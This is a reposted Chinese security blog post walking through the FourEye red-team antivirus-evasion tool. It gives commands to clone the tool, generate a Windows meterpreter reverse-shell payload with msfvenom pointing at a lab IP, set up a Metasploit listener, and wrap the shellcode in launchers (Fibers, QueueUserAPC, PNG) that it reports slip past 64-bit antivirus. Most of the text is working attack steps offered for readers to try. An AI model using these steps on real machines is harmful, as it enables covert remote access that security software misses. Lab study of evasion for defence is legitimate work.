本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!
欢迎各位添加微信号:asj-jacky
加入安世加 交流群 和大佬们一起交流安全技术
经过尝试并且借鉴FourEye(重明) - AV Evasion Tool For Red Team 文章的相关内容,把相关的过程分享给大家,感兴趣的同学可以进行尝试一下,不过在实践中发现了一些小问题,大家可以自己看过程;
使用在win7 32位环境下,容易被检测出;使用在win7 64位环境下,不易被检测出;【使用kali2020运行出了问题,面临i686-w64-mingw32-g++编译win-vlc问题】
kali 2018
win7 32位
win7 64位
在kali上下载工具
git clone https://github.com/lengjibo/FourEye.git
cd FourEye
pip install -r requirements.txt
python3 BypassFramework.py
BypassAV1:Shellcode Launcher using Fibers
root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.130 LPORT=444 -f raw -o shellcode.raw
生成木马文件
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.28.130
lhost => 192.168.28.130
msf5 exploit(multi/handler) > set lport 444
lport => 444
使用python脚本
地址:https://github.com/lengjibo/FourEye
root@kali:~/桌面/FourEye-main# python3 BypassFramework.py
FourEye >>list
[+] Shellcode:
[+] Exe:
在win7 32位上运行 shellcode.exe 观察是否免杀:
类型:
HEUR/QVM20.1.E9BB.Malware.Gen
描述:
HEUR/QVM20.1.E9BB.Malware.Gen
扫描引擎:引擎
文件指纹(MD5):
4a0ee74615140d096cdc402ccf292b6b
使用了
BypassAV1:Shellcode Launcher using Fiber
回连
BypassAV2:Shellcode Launcher using QueueUserAPC
BypassAV3:Shellcode Launcher using PNG
BypassAV3:Shellcode Launcher using PNG
生成木马文件
root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.16.129 LPORT=444 -f raw -o shellcode.raw
在kali上执行相关的操作,获取shellcode文件
在win7 64位上运行 shellcode.exe 观察是否免杀:
BypassAV2:Shellcode Launcher using QueueUserAPC
BypassAV1:Shellcode Launcher using Fibers
综合分析,发现针对32位的杀毒软件,该木马文件不起什么作用,应该与编译的方式有关吧,i686-w64-mingw32-g++ -m 32;64位的杀毒软件,该木马文件毫不客气的绕过了它的查杀;
开头需要导入很多的依赖包文件,之后,要求使用Python3 版本运行显示红色
当为真时则尝试命令输入>> 为绿色;之后,如果命令为退出则停止;列表,帮助,执行命令为shellcode时,进行下一次的循环while语句,bypass文件的生成;
